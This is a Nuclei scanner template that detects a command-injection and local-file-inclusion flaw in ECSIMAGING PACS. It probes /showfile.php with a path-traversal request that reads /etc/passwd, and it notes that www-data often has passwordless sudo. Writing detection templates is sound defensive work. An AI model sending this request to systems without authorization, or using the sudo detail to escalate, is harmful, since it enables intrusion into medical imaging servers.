nuclei-templates/vulnerabilities/other/ecsimagingpacs-rce.yaml

31 lines
915 B
YAML
Raw Normal View History

2022-05-12 08:20:38 +00:00
id: ecsimagingpacs-rce
info:
name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion
2022-05-12 08:20:38 +00:00
author: ritikchaddha
severity: critical
description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access.
2022-05-12 08:20:38 +00:00
reference: https://www.exploit-db.com/exploits/49388
2022-05-12 11:08:58 +00:00
metadata:
verified: false
2022-05-12 08:20:38 +00:00
tags: ecsimagingpacs,rce
classification:
cwe-id: CWE-78
2022-05-12 08:20:38 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/showfile.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by cs 05/12/2022